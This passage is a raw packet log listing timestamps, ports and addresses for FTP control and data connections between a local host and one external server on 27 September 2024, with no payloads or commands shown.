Sep 27, 2024 13:12:20.534499884 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.534504890 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.534527063 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.534534931 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.534569979 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.534571886 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.534645081 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.540103912 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.540138960 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.540165901 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.540168047 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.540211916 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.540236950 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.540386915 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.540414095 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.540441990 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.540446997 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.540469885 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.540477037 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.540498018 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.540503025 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.540525913 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.540558100 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.546041965 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.546152115 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.546184063 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.546231985 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.546260118 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.546653986 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.546681881 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.546709061 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.546756983 CEST | 55958 | 49767 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.546827078 CEST | 49767 | 55958 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.740597010 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:20.766846895 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:20.766907930 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.233882904 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.234174967 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.242105961 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.242135048 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.242162943 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.242176056 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.242230892 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.242939949 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.242969036 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.242995977 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.243012905 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.243022919 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.243048906 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.243060112 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.243074894 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.243083954 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.243093014 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.243102074 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.243139982 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.243149042 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.247097015 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.247159004 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.247241974 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.247314930 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.247375965 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.247436047 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.247462988 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.247493982 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.247509003 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.247582912 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.248126030 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.248153925 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.248186111 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.248198032 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.248222113 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.248399019 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.248426914 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.248456955 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.248852968 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.248883009 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.252269983 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.252434969 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.252535105 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.252564907 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.252758026 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.252784014 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.253333092 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.253604889 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.253846884 CEST | 62561 | 49768 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.253962994 CEST | 49768 | 62561 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.318715096 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:21.349622011 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:21.555351973 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:22.146176100 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:22.258740902 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:26.871378899 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:26.876511097 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:27.250178099 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:27.256285906 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:27.261142969 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:27.264455080 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:27.264462948 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:27.269412994 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.204030037 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.204361916 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.209297895 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.209353924 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.209357977 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.209404945 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.209415913 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.209434986 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.209453106 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.209460974 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.209485054 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.209520102 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.209548950 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.209577084 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.209600925 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.209603071 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.209631920 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.209631920 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.209661007 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.209680080 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.209681034 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.209816933 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.214288950 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.214346886 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.214452982 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.214508057 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.214579105 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.214605093 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.214629889 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.214638948 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.214664936 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.214687109 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.214694977 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.214740992 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.214752913 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.214780092 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.214806080 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.214811087 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.214829922 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.214855909 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.214962006 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.214991093 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.219270945 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.219702005 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.219731092 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.219810009 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.219942093 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.219985962 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.220016003 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.220067024 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.220376968 CEST | 61524 | 49769 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.220428944 CEST | 49769 | 61524 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.295928001 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.934423923 CEST | 49770 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.939512014 CEST | 21 | 49770 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.939594030 CEST | 49770 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.941293955 CEST | 49770 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:28.946320057 CEST | 21 | 49770 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:28.946393013 CEST | 49770 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:29.347023964 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:29.463661909 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:29.464018106 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:30.072341919 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:30.079711914 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:30.461297035 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:30.461822033 CEST | 49771 | 55824 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:30.466815948 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:30.466905117 CEST | 49771 | 55824 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:30.466968060 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:30.471918106 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.309773922 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.313445091 CEST | 49771 | 55824 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:31.318507910 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.318566084 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.318593025 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.318599939 CEST | 49771 | 55824 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:31.318623066 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.318650961 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.318677902 CEST | 49771 | 55824 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:31.318769932 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.318797112 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.318810940 CEST | 49771 | 55824 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:31.318845987 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.318856001 CEST | 49771 | 55824 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:31.318873882 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.318902016 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.318948984 CEST | 49771 | 55824 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:31.320988894 CEST | 49771 | 55824 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:31.323642969 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.323671103 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.323698044 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.323750973 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.323769093 CEST | 49771 | 55824 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:31.323777914 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.323827028 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.323854923 CEST | 49771 | 55824 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:31.323875904 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.323966026 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.324050903 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.324078083 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.324103117 CEST | 49771 | 55824 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:31.324143887 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.324179888 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.326025963 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.328834057 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.328861952 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.328983068 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.329061985 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.329111099 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.329137087 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.329168081 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.329227924 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.329566002 CEST | 55824 | 49771 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:31.332767963 CEST | 49771 | 55824 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:31.524348974 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:32.126585960 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:32.289938927 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:37.660360098 CEST | 49772 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:37.665560961 CEST | 21 | 49772 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:37.665694952 CEST | 49772 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:37.665891886 CEST | 49772 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:37.671145916 CEST | 21 | 49772 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:37.671538115 CEST | 49772 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:37.840342999 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:37.845503092 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:38.203234911 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:38.203908920 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:38.208750963 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:38.208827972 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:38.208956003 CEST | 49737 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:38.214075089 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:38.216949940 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:38.222384930 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:38.587141991 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:38.587615967 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:38.592801094 CEST | 55438 | 49774 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:38.592883110 CEST | 49774 | 55438 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:38.592953920 CEST | 49756 | 21 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:38.598037958 CEST | 21 | 49756 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.049989939 CEST | 21 | 49737 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.050199986 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.055248022 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.055277109 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.055308104 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.055335045 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.055358887 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.055361986 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.055411100 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.055413008 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.055474997 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.055475950 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.055502892 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.055531979 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.055550098 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.055560112 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.055597067 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.055623055 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.055628061 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.055649996 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.055861950 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.060580015 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.060607910 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.060636044 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.060652971 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.060666084 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.060692072 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.060740948 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.060740948 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.060767889 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.060795069 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.060821056 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.060821056 CEST | 64130 | 49773 | 110.4.45.197 | 192.168.2.4 |
Sep 27, 2024 13:12:39.060856104 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
Sep 27, 2024 13:12:39.060856104 CEST | 49773 | 64130 | 192.168.2.4 | 110.4.45.197 |
